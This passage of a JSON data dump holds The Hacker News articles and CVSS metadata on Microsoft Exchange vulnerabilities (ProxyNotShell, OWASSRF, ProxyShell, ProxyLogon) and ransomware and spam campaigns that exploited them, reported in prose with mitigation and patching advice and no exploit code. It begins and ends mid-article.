attackers would need some level of authentication to activate the chained vulnerabilities exploit, the exact level of authentication required \u2013 rated \"Low\" by Microsoft \u2013 is not yet clarified. Yet, this required low authentication level should effectively prevent a massive, automated attack targeting every Exchange server around the globe. This hopefully will prevent a replay of the 2021 ProxyShell debacle.\n\nYet, finding a single valid email address/password combination on a given Exchange server should not be overly difficult, and, as this attack bypasses MFA or FIDO token validation to log into Outlook Web Access, a single compromised email address/password combination is all that is needed.\n\n## Mitigating ProxyNotShell Exposure\n\nAt the time of writing, Microsoft has not yet issued a patch but recommends that users [add a blocking rule](<https://msrc-blog.microsoft.com/2022/09/29/customer-guidance-for-reported-zero-day-vulnerabilities-in-microsoft-exchange-server/>) as a mitigation measure of unknown efficacy.\n\nBlocking incoming traffic to Exchange Servers holding critical asserts is also an option, though only practicable if such a measure does not impact vital operations and should ideally be perceived as a temporary measure pending Microsoft's issuance of a verified patch.\n\n## Assessing ProxyNotShell Exposure\n\nAs the current mitigation options are either of unverified efficacy or potentially damaging to the smooth running of operations, evaluating the degree of exposure to ProxyNotShell might prevent taking potentially disruptive unnecessary preventative measures, or indicate which assets to preemptively migrate to unexposed servers.\n\nCymulate Research Lab has developed a [custom-made assessment for ProxyNotShell](<https://cymulate.com/free-trial/>) that enable organizations to estimate exactly their degree of exposure to ProxyNotShell.\n\nA ProxyNotShell attack vector has been added to the advanced scenarios templates, and running it on your environment yields the necessary information to validate exposure \u2013 or lack thereof - to ProxyNotShell.\n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEgOoxz7w2_H46l72-JIWEEozP6gnLHfSQt_wbm1RRkjB0NOn2rBaB0wW4-jBFx4wbMgPAmXZvOdPPwjnUFX2u8zbdJZLSXKMAoft6Skt3EXk_gH1ehXK9DLBpHKouidVH9WE9P1SQs3h-s1VAfGKtHqeXaxkjtGS4lDIItWgmQo1FSLk_6z6fV7ZtQw/s728-e100/222.png>)\n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEiqGWTwc-0vwEKrwSp1s7coId4IRI3KelQKVBG1iXsx0N32996O0Lprr0PA035V1oLkFpdjQ1euXlqcL0le7gsuWoWI9NSCEBW0Nj-OCQZn8ovDyuK-b-MtVYhjKmGIWuZO5IkdqNRBvKSiWttxGP46GmxjlZtpI_FSz2728WiqkvKTOoOJIp0KrjOH/s728-e100/111.png>)\n\nUntil verified patches are available from Microsoft, assessing exposure to ProxyNotShell to evaluate exactly which servers are potential targets is the most cost-efficient way to evaluate exactly which assets are exposed and devise targeted preemptive measures with maximum impact.\n\n_Note: This article is contributed by [Cymulate Research Labs](<https://cymulate.com/>)._\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-04T08:05:00", "type": "thn", "title": "ProxyNotShell \u2013 the New Proxy Hell?", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523", "CVE-2022-41040", "CVE-2022-41082"], "modified": "2022-10-04T10:19:04", "id": "THN:54023E40C0AA4CB15793A39F3AF102AB", "href": "https://thehackernews.com/2022/10/proxynotshell-new-proxy-hell.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-12-22T04:09:51", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEhTLGmaNN3OFFmSILTclxE-UymYSclEFgrwvp76liyrsFGtPk5wpNGVl-AXdppW10UvY5aPmtLoqkxVC3ifpEx9XH3JarmYqPPQtscOXnAMl0K3lHF2nV6pcyicT2bu5U9BbJFd6hbBBVHswmATwzgzQEMc6GEUPcs4-k1yW0cjoEdfsN0LDRvVh5Ty/s728-e100/email-hacking.png>)\n\nThreat actors affiliated with a ransomware strain known as Play are leveraging a never-before-seen exploit chain that bypasses blocking rules for ProxyNotShell flaws in Microsoft Exchange Server to achieve remote code execution (RCE) through Outlook Web Access ([OWA](<https://en.wikipedia.org/wiki/Outlook_on_the_web>)).\n\n\"The new exploit method bypasses [URL rewrite mitigations](<https://thehackernews.com/2022/10/microsoft-issues-improved-mitigations.html>) for the [Autodiscover endpoint](<https://learn.microsoft.com/en-us/exchange/architecture/client-access/autodiscover>),\" CrowdStrike researchers Brian Pitchford, Erik Iker, and Nicolas Zilio [said](<https://www.crowdstrike.com/blog/owassrf-exploit-analysis-and-recommendations/>) in a technical write-up published Tuesday.\n\nPlay ransomware, which first surfaced in June 2022, has been [revealed](<https://www.trendmicro.com/en_us/research/22/i/play-ransomware-s-attack-playbook-unmasks-it-as-another-hive-aff.html>) to adopt many tactics employed by other ransomware families such as [Hive](<https://thehackernews.com/2022/11/hive-ransomware-attackers-extorted-100.html>) and [Nokoyawa](<https://www.trendmicro.com/en_us/research/22/c/nokoyawa-ransomware-possibly-related-to-hive-.html>), the latter of which [upgraded to Rust](<https://www.zscaler.com/blogs/security-research/nokoyawa-ransomware-rust-or-bust>) in September 2022.\n\nThe cybersecurity company's investigations into several Play ransomware intrusions found that initial access to the target environments was not achieved by directly exploiting [CVE-2022-41040](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-41040>), but rather through the OWA endpoint.\n\nDubbed **OWASSRF**, the technique likely takes advantage of another critical flaw tracked as [CVE-2022-41080](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-41080>) (CVSS score: 8.8) to achieve privilege escalation, followed by abusing [CVE-2022-41082](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-41082>) for remote code execution.\n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEh59pwm9Kxv252Uv99amN02oXTHDo8okfVqDQEPqxZy2wZk0tCTHx16xDzABz2QYvABQfBENatlbN2owTSezPh4jYOK-0bGPr_JyWKUPsX1nnLeX5X9za6Rfk5c-juoJI5Q9NT97ANp9X64VSnb_EWUp5s1jYoZJap_uzgruqlI0kYKYqqtMvM5hZQm/s728-e100/email-security.png>)\n\nIt's worth noting that both CVE-2022-41040 and CVE-2022-41080 stem from a case of server-side request forgery ([SSRF](<https://owasp.org/www-community/attacks/Server_Side_Request_Forgery>)), which permits an attacker to access unauthorized internal resources, in this case the [PowerShell remoting](<https://learn.microsoft.com/en-us/powershell/exchange/exchange-management-shell>) service.\n\nCrowdStrike said the successful initial access enabled the adversary to drop legitimate Plink and AnyDesk executables to maintain persistent access as well as take steps to purge Windows Event Logs on infected servers to conceal the malicious activity.\n\nAll three vulnerabilities were addressed by Microsoft as part of its [Patch Tuesday updates](<https://thehackernews.com/2022/11/install-latest-windows-update-asap.html>) for November 2022. It's, however, unclear if CVE-2022-41080 was actively exploited as a zero-day alongside CVE-2022-41040 and CVE-2022-41082.\n\nThe Windows maker, for its part, has tagged CVE-2022-41080 with an \"Exploitation More Likely\" assessment, implying it's possible for an attacker to create exploit code that could be utilized to reliably weaponize the flaw.\n\nCrowdStrike further noted that a proof-of-concept (PoC) Python script [discovered](<https://twitter.com/Purp1eW0lf/status/1602989967776808961>) and leaked by Huntress Labs researcher Dray Agha last week may have been put to use by the Play ransomware actors for initial access.\n\nThis is evidenced by the fact that the execution of the Python script made it possible to \"replicate the logs generated in recent Play ransomware attacks.\"\n\n\"Organizations should apply the November 8, 2022 patches for Exchange to prevent exploitation since the URL rewrite mitigations for ProxyNotShell are not effective against this exploit method,\" the researchers said.\n\n \n\n\nFound this article interesting? Follow us on [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-12-21T07:41:00", "type": "thn", "title": "Ransomware Hackers Using New Way to Bypass MS Exchange ProxyNotShell Mitigations", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-41040", "CVE-2022-41080", "CVE-2022-41082"], "modified": "2022-12-22T03:36:49", "id": "THN:DF2B360775F2B7F0C76A360FDA254FBA", "href": "https://thehackernews.com/2022/12/ransomware-hackers-using-new-way-to.html", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-01-07T18:11:10", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEhIkYkTBU5KJGFe1OgGLpYygDiWxeko_-avcEdQlausI60efbG2CTSjXoushTX82kWSNdNGwqru9TyK8Ohoh9Af2DlFFuzSZEDV0NH_rRPaEYUi86D_fRS5OutucQG2fb-8zydnRbryW1mN5kn5PUKySHDQ1UTPRbRWn1T-eB2NPm0Jh80Md9edRKdq/s728-rj-e365/rackspace-breach.png>)\n\nCloud services provider Rackspace on Thursday confirmed that the ransomware gang known as **Play** was responsible for last month's breach.\n\nThe security incident, which took place on December 2, 2022, leveraged a previously unknown security exploit to gain initial access to the Rackspace Hosted Exchange email environment.\n\n\"This zero-day exploit is associated with [CVE-2022-41080](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-41080>),\" the Texas-based company [said](<https://status.apps.rackspace.com/index/viewincidents?group=2>). \"Microsoft disclosed CVE-2022-41080 as a privilege escalation vulnerability and did not include notes for [it] being part of a remote code execution chain that was exploitable.\"\n\nRackspace's forensic investigation found that the threat actor accessed the Personal Storage Table ([.PST](<https://en.wikipedia.org/wiki/Personal_Storage_Table>)) of 27 customers out of a total of nearly 30,000 customers on the Hosted Exchange email environment.\n\nHowever, the company said there is no evidence the adversary viewed, misused, or distributed the customer's emails or data from those personal storage folders. It further said it intends to retire its Hosted Exchange platform as part of a planned migration to Microsoft 365.\n\nIt's not currently not known if Rackspace paid a ransom to the cybercriminals, but the disclosure follows a report from CrowdStrike last month that shed light on the new technique, dubbed [OWASSRF](<https://thehackernews.com/2022/12/ransomware-hackers-using-new-way-to.html>), employed by the Play ransomware actors.\n\nThe mechanism targets Exchange servers that are unpatched against the ProxyNotShell vulnerabilities ([CVE-2022-41040](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-41040>) and [CVE-2022-41082](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-41082>)) but have in place URL rewrite mitigations for the Autodiscover endpoint.\n\nThis involves an exploit chain comprising CVE-2022-41080 and CVE-2022-41082 to achieve remote code execution in a manner that bypasses the blocking rules through Outlook Web Access (OWA). The flaws were addressed by Microsoft in November 2022.\n\nThe Windows maker, in a statement shared with The Hacker News, urged customers to prioritize installing its [November 2022 Exchange Server updates](<https://techcommunity.microsoft.com/t5/exchange-team-blog/released-november-2022-exchange-server-security-updates/ba-p/3669045>) and noted that the reported method targets vulnerable systems that have not applied the latest fixes.\n\n \n\n\nFound this article interesting? Follow us on [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-01-06T09:01:00", "type": "thn", "title": "Rackspace Confirms Play Ransomware Gang Responsible for Recent Breach", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-41040", "CVE-2022-41080", "CVE-2022-41082"], "modified": "2023-01-07T17:47:30", "id": "THN:A356406D6A8ADF4F4592DBAAEB6CDA74", "href": "https://thehackernews.com/2023/01/rackspace-confirms-play-ransomware-gang.html", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-05-09T12:39:27", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEgG4LpJKxqUO2-qxnPcHk7kZshWlpcUJf4apWnuuu8g9A2r0wcvybcwpf7lOoNA63j4bRBhFvjSOcGs6VNIFsmjXTIplZEkjAFtBn3cM6NGJ0rIS2GGGAKNgL2WQIm_-fjXlryklUzygBckkBMBoeHlXhheLR9onLzGHVYPSgJnrJE7GbCsqTLo57hD/s728-e100/hive-ransomware.jpg>)\n\nA recent Hive ransomware attack carried out by an affiliate involved the exploitation of \"ProxyShell\" vulnerabilities in the Microsoft Exchange Server that were disclosed last year to encrypt an unnamed customer's network.\n\n\"The actor managed to achieve its malicious goals and encrypt the environment in less than 72 hours from the initial compromise,\" Varonis security researcher, Nadav Ovadia, [said](<https://www.varonis.com/blog/hive-ransomware-analysis>) in a post-mortem analysis of the incident. \n\nHive, which was [first observed](<https://thehackernews.com/2022/02/master-key-for-hive-ransomware.html>) in June 2021, follows the lucrative ransomware-as-a-service (RaaS) scheme adopted by other cybercriminal groups in recent years, enabling affiliates to deploy the file-encrypting malware after gaining a foothold into their victims' networks.\n\n[ProxyShell](<https://thehackernews.com/2021/08/hackers-actively-searching-for.html>) \u2014 tracked as CVE-2021-31207, CVE-2021-34523, and CVE-2021-34473 \u2014 involves a combination of security feature bypass, privilege escalation, and remote code execution in the Microsoft Exchange Server, effectively granting the attacker the ability to execute arbitrary code on affected servers.\n\nThe issues were addressed by Microsoft as part of its Patch Tuesday updates for April and May 2021.\n\nIn this case, successful exploitation of the flaws allowed the adversary to deploy web shells on the compromised server, using them to run malicious PowerShell code with SYSTEM privileges to create a new backdoor administrator user, hijack the domain admin account, and perform lateral movement.\n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEgbU5YaGjiHhZvFPL5Fqh7rHbVldX6X-unk-Mq6dP0icasfzkogYQnkRDy9ZUNWr3oca2oh6FGdjSzMm5uyXe1DLzwsty4H8hXGZia0azIu3Q24ZyBwemMQXMvu5dpzZQn-9MUl_WWAG5opQBaoXlyg6Esg2eBVWtdYcBrz5l7yZPDtCD1v9nzKF-D8/s728-e100/hive.jpg>)\n\nThe web shells used in the attack are said to have been sourced from a [public git repository](<https://github.com/ThePacketBender/webshells>) and given filenames containing a random mix of characters to evade detection, Ovadia said. Also executed was an additional obfuscated PowerShell script that's part of the Cobalt Strike framework.\n\nFrom there, the threat actor moved to scan the network for valuable files, before proceeding to deploy the Golang ransomware executable (named \"Windows.exe\") to complete the encryption process and display the ransom note to the victim.\n\nOther operations carried out by the malware include deleting shadow copies, turning off security products, and clearing Windows event logs to avoid detection, prevent recovery, and ensure that the encryption happens without any hiccup.\n\nIf anything, the findings are yet another indicator that patching for known vulnerabilities is key to thwarting cyberattacks and other nefarious activities.\n\n\"Ransomware attacks have grown significantly over the past years and remain the preferred method of threat actors aiming to maximize profits,\" Ovadia said. \"It may potentially harm an organization's reputation, disrupt regular operations and lead to temporary, and possibly permanent, loss of sensitive data.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-21T10:00:00", "type": "thn", "title": "New Incident Report Reveals How Hive Ransomware Targets Organizations", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2022-04-21T10:00:58", "id": "THN:84E53E1CA489F43A3D68EC1B18D6C2E2", "href": "https://thehackernews.com/2022/04/new-incident-report-reveals-how-hive.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:38:05", "description": "[](<https://thehackernews.com/new-images/img/a/AVvXsEjiGzDP_Q8TgakrIFP6H8c0NlSHHH4ztdEtesv8G-AaS-LvfiauO6JgcrFpPKfplpRuqYssvepWzyhQaLMIPqPzyt00vE0kNEL3qEg1k1YRQpWZouKa_km8jD-kuKbNBXugV_MhYndYW41kM6o2z77T4oOGQlDGhGk-HA0tZfdol-RO_fCE6o7N54uW>)\n\nThreat actors are exploiting ProxyLogon and ProxyShell exploits in unpatched Microsoft Exchange Servers as part of an ongoing spam campaign that leverages stolen email chains to bypass security software and deploy malware on vulnerable systems.\n\nThe findings come from Trend Micro following an investigation into a number of intrusions in the Middle East that culminated in the distribution of a never-before-seen loader dubbed SQUIRRELWAFFLE. First publicly [documented](<https://thehackernews.com/2021/10/hackers-using-squirrelwaffle-loader-to.html>) by Cisco Talos, the attacks are believed to have commenced in mid-September 2021 via laced Microsoft Office documents.\n\n\"It is known for sending its malicious emails as replies to pre-existing email chains, a tactic that lowers a victim's guard against malicious activities,\" researchers Mohamed Fahmy, Sherif Magdy, Abdelrhman Sharshar [said](<https://www.trendmicro.com/en_us/research/21/k/Squirrelwaffle-Exploits-ProxyShell-and-ProxyLogon-to-Hijack-Email-Chains.html>) in a report published last week. \"To be able to pull this off, we believe it involved the use of a chain of both ProxyLogon and ProxyShell exploits.\"\n\n[ProxyLogon](<https://thehackernews.com/2021/03/urgent-4-actively-exploited-0-day-flaws.html>) and [ProxyShell](<https://thehackernews.com/2021/08/microsoft-exchange-under-attack-with.html>) refer to a collection of flaws in Microsoft Exchange Servers that could enable a threat actor to elevate privileges and remotely execute arbitrary code, effectively granting the ability to take control of the vulnerable machines. While the ProxyLogon flaws were addressed in March, the ProxyShell bugs were patched in a series of updates released in May and July.\n\n[](<https://thehackernews.com/new-images/img/a/AVvXsEhYwBTFRq5MuslNIXJAtZNZ-q9Ik0Wyu_z6HVG8loZsBaeJR_tXRLvm18OZvIJYeeOyYp0DVHZdMg8sdqe9H3ePEot8dMGuNuC25YWuyp09kuYsm_qh2nU_3dlFK7X2kVXn-DYmtklqChAj_2BOpas4TFiWcbPR3PtoX5RKukcpGn0sd1S8Ubdqo1bu>) \n--- \nDLL infection flow \n \nTrend Micro said it observed the use of public exploits for CVE-2021-26855 (ProxyLogon), CVE-2021-34473, and CVE-2021-34523 (ProxyShell) on three of the Exchange servers that were compromised in different intrusions, using the access to hijack legitimate email threads and send malicious spam messages as replies, thereby increasing the likelihood that unsuspecting recipients will open the emails.\n\n\"Delivering the malicious spam using this technique to reach all the internal domain users will decrease the possibility of detecting or stopping the attack, as the mail getaways will not be able to filter or quarantine any of these internal emails,\" the researchers said, adding the attackers behind the operation did not carry out lateral movement or install additional malware so as to stay under the radar and avoid triggering any alerts.\n\nThe attack chain involves rogue email messages containing a link that, when clicked, drops a Microsoft Excel or Word file. Opening the document, in turn, prompts the recipient to enable macros, ultimately leading to the download and execution of the SQUIRRELWAFFLE malware loader, which acts as a medium to fetch final-stage payloads such as Cobalt Strike and Qbot.\n\nThe development marks a new escalation in phishing campaigns where a threat actor has breached corporate Microsoft Exchange email servers to gain unauthorized access to their internal mail systems and distribute malicious emails in an attempt to infect users with malware.\n\n\"SQUIRRELWAFFLE campaigns should make users wary of the different tactics used to mask malicious emails and files,\" the researchers concluded. \"Emails that come from trusted contacts may not be enough of an indicator that whatever link or file included in the email is safe.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-22T11:47:00", "type": "thn", "title": "Hackers Exploiting ProxyLogon and ProxyShell Flaws in Spam Campaigns", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2021-11-23T07:33:36", "id": "THN:0D80EEB03C07D557AA62E071C7A7C619", "href": "https://thehackernews.com/2021/11/hackers-exploiting-proxylogon-and.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:37:24", "description": "[](<https://thehackernews.com/new-images/img/a/AVvXsEihM5iYK8V59Az6V_QU4QfgIeRF_0hGVdMPzkolUAVIW-fNuFPicRQP8GVCKVzA_FETzCTUZXWBI67kH6LRZTLGCO5eI9UumwAso17F_kIigeX8Y7Z41AMwAPgq1iysoZkTTX-VU5eO4nCRvjFq57tq6FcnFZd3DBb3A8kWOZ253GJWm-fH0WFE7Fna>)\n\nThe U.S. Cybersecurity and Infrastructure Security Agency is warning of active exploitation attempts that leverage the latest line of \"**ProxyShell**\" Microsoft Exchange vulnerabilities that were patched earlier this May, including deploying LockFile ransomware on compromised systems.\n\nTracked as CVE-2021-34473, CVE-2021-34523, and CVE-2021-31207, the vulnerabilities enable adversaries to bypass ACL controls, elevate privileges on the Exchange PowerShell backend, effectively permitting the attacker to perform unauthenticated, remote code execution. While the former two were addressed by Microsoft on April 13, a patch for CVE-2021-31207 was shipped as part of the Windows maker's May Patch Tuesday updates.\n\n\"An attacker exploiting these vulnerabilities could execute arbitrary code on a vulnerable machine,\" CISA [said](<https://us-cert.cisa.gov/ncas/current-activity/2021/08/21/urgent-protect-against-active-exploitation-proxyshell>).\n\nThe development comes a little over a week after cybersecurity researchers sounded the alarm on [opportunistic scanning and exploitation](<https://thehackernews.com/2021/08/hackers-actively-searching-for.html>) of unpatched Exchange servers by taking advantage of the ProxyShell attack chain.\n\n[](<https://thehackernews.com/new-images/img/a/AVvXsEi9pcvxkZCqcBcriArdPtNn0AWuIafJEeUPlEHsu4z-oKwZf3gzsprTbCyyBAmMBzU-gFoDqTD8zWP4vrlEdDv_w5I3I5iSFyAS8RZ2p_jjRO0sOXbKoN31TMsPPfb0BXXZt8m7aM2SAtTFrkZ3hdSN1FSLaynBoGiYDkl78s_i0T5Kva4eudH21Jzf>) \n--- \nImage Source: [Huntress Labs](<https://www.huntress.com/blog/rapid-response-microsoft-exchange-servers-still-vulnerable-to-proxyshell-exploit>) \n \nOriginally demonstrated at the [Pwn2Own hacking contest](<https://thehackernews.com/2021/04/windows-ubuntu-zoom-safari-ms-exchange.html>) in April this year, ProxyShell is part of a broader trio of exploit chains discovered by DEVCORE security researcher Orange Tsai that includes ProxyLogon and ProxyOracle, the latter of which concerns two remote code execution flaws that could be employed to recover a user's password in plaintext format.\n\n\"They're backdooring boxes with webshells that drop other webshells and also executables that periodically call out,\" researcher Kevin Beaumont [noted](<https://twitter.com/GossiTheDog/status/1425844380376735746>) last week.\n\nNow according to researchers from Huntress Labs, at least [five distinct styles of web shells](<https://www.huntress.com/blog/rapid-response-microsoft-exchange-servers-still-vulnerable-to-proxyshell-exploit>) have been observed as deployed to vulnerable Microsoft Exchange servers, with over over 100 incidents reported related to the exploit between August 17 and 18. Web shells grant the attackers remote access to the compromised servers, but it isn't clear exactly what the goals are or the extent to which all the flaws were used.\n\nMore than 140 web shells have been detected across no fewer than 1,900 unpatched Exchanger servers to date, Huntress Labs CEO Kyle Hanslovan [tweeted](<https://twitter.com/KyleHanslovan/status/1428804893423382532>), adding \"impacted [organizations] thus far include building manufacturing, seafood processors, industrial machinery, auto repair shops, a small residential airport and more.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-22T09:51:00", "type": "thn", "title": "WARNING: Microsoft Exchange Under Attack With ProxyShell Flaws", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2021-08-23T13:28:25", "id": "THN:5BE77895D84D1FB816C73BB1661CE8EB", "href": "https://thehackernews.com/2021/08/microsoft-exchange-under-attack-with.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-12T08:05:16", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjB9Dk9_CtwU0e7o73L8Ctcukw86W5iQ5ovoTM1kBO_tiERjq84jxpKHzqShkuM1aMl6Au7sULjY1iTAtzw5NrUSjNj_xsk0dB6JJO3CT8wIaRAnfzA86ZECd4CWN2tjWREiW3roAj-De9vCeIbdpMQGtJC0njmkr2-6-1DXvcz3yDBVBEmQ25saSok/s728-e100/windows.jpg>)\n\nMicrosoft's Patch Tuesday update for the month of October has addressed a total of [85 security vulnerabilities](<https://msrc.microsoft.com/update-guide/releaseNote/2022-Oct>), including fixes for an actively exploited zero-day flaw in the wild.\n\nOf the 85 bugs, 15 are rated Critical, 69 are rated Important, and one is rated Moderate in severity. The update, however, does not include mitigations for the [actively exploited](<https://unit42.paloaltonetworks.com/proxynotshell-cve-2022-41040-cve-2022-41082/>) [ProxyNotShell](<https://thehackernews.com/2022/10/microsoft-issues-improved-mitigations.html>) flaws in [Exchange Server](<https://techcommunity.microsoft.com/t5/exchange-team-blog/released-october-2022-exchange-server-security-updates/ba-p/3646263>).\n\nThe [patches](<https://www.rapid7.com/blog/post/2022/10/11/patch-tuesday-october-2022/>) come alongside [updates to resolve 12 other flaws](<https://learn.microsoft.com/en-us/deployedge/microsoft-edge-relnotes-security>) in the Chromium-based Edge browser that have been released since the beginning of the month.\n\nTopping the list of this month's patches is [CVE-2022-41033](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-41033>) (CVSS score: 7.8), a privilege escalation vulnerability in Windows COM+ Event System Service. An anonymous researcher has been credited with reporting the 